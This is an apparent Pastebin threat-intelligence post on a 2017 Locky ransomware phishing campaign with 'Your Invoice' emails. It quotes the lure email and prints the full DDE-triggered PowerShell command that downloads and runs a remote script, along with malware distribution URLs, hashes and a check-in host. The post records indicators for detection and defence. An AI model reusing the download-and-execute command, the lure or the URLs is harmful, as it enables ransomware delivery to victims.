Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 2017-10-24: #locky email phishing campaign "Your Invoice xxxxxx"
- Email sample:
- ----------------------------------------------------------------------------------------------------------------
- From: "Anna" <Anna.Priestman@iscil.org>
- Date: Tue, 24 Oct 2017 17:23:04 +0700
- Subject: Your Invoice 99707
- Your Invoice is attached. =20
- If you feel you have received this email in error, please reply to this email to inform us of any necessary corrections.
- Invoice: Invoice_file_54654.doc
- ----------------------------------------------------------------------------------------------------------------
- - email does not have To: header
- - subject is "Your Invoice <5-6 digits>"
- - attached file "Invoice_file_<5-6 digits>.doc" is a MS Word file containing a DDE exploit which will execute the following command:
- C:\\Windows\\System32\\cmd.exe "/k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create(' http://transmercasa.com/JHGGsdsw6')).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr"
- The command will try to download additional powershell script from one of the following locations:
- http://transmercasa.com/JHGGsdsw6
- http://urcho.com/JHGGsdsw6
- This powershell script will download the malware loader from one of:
- http://tatianadecastelbajac.fr/kjhgFG
- http://video.rb-webdev.de/kjhgFG
- http://themclarenfamily.com/kjhgFG
- Malware loader:
- - SHA256: 6106d1b5963feb632eee28aaee5b68e85aef1d090c5e5ef2899b3a0f1a3f7c5b, MD5: eae849f6510db451f4fbdb780b5d49aa
- - VT: https://www.virustotal.com/en/file/6106d1b5963feb632eee28aaee5b68e85aef1d090c5e5ef2899b3a0f1a3f7c5b/analysis/1508841473/
- - HA (doc file): https://www.reverse.it/sample/ea77730c72da80c9f375b8474ff73af189429a0d1e4b92c6af7341391f73edae?environmentId=100
- - loader will checkin via POST request to http://gdiscoun.org
- - loader will download encoded malware from http://webhotell.enivest.no/cuYT39.enc
- Malware:
- - locky, .asasin variant
Add Comment
Please, Sign In to add comment